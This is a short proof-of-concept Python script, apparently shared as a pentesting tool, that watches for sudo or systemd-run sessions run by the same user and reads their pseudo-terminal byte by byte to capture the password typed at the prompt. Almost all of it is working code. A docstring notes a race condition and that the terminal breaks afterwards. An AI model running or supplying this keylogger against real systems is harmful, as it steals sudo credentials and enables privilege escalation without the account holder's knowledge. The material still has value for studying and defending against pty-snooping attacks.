A POC for the user readable pty allowing you to capture your password, but with sudo. Has constraints, read docstring.

catchsudo.py

"""
A POC for the user readable pty allowing you to capture your password,
but with sudo. You might need to press enter once at the password prompt
to get this to work, bit of a race condition there. Should be noted that
a root owned tty only starts after a correct password, but you can still
log keys after that with this (but it will break the terminal and will
need to be killed).

The only advantage to targeting systemd-run --pty is that you don't seem to
need to kill -9 the targeted session afterwards so it behaves a bit better.

I don't consider this a security issue, though this one I do get why it
can be considered undesirable.
Might be useful during pentesting when you already have access to an account
that can manage the system but don't know the password to access sudo.
But if you are dependent on a sysadmin logging in and using sudo/systemd-run
you can already do 2000 other things.

Tested on Ubuntu Desktop 22.04.
"""
import os
import psutil

WANT_TO_HIJACK = ['sudo', 'systemd-run']


def takeover(pty):
    f = open(pty, 'rb')

    while True:
        k = f.read(1)
        print(k)
        if k == b'\n':
            break

    f.close()


def find_target():
    us = os.getlogin()

    for process in psutil.process_iter(['name', 'username', 'terminal']):
        if process.info['name'] not in WANT_TO_HIJACK:
            continue

        if process.info['username'] != us:
            continue

        return process.info['terminal']

    return None


def main():
    while True:
        pty = find_target()
        if pty:
            print(f'found {pty}')
            takeover(pty)
            break


if __name__ == "__main__":
    main()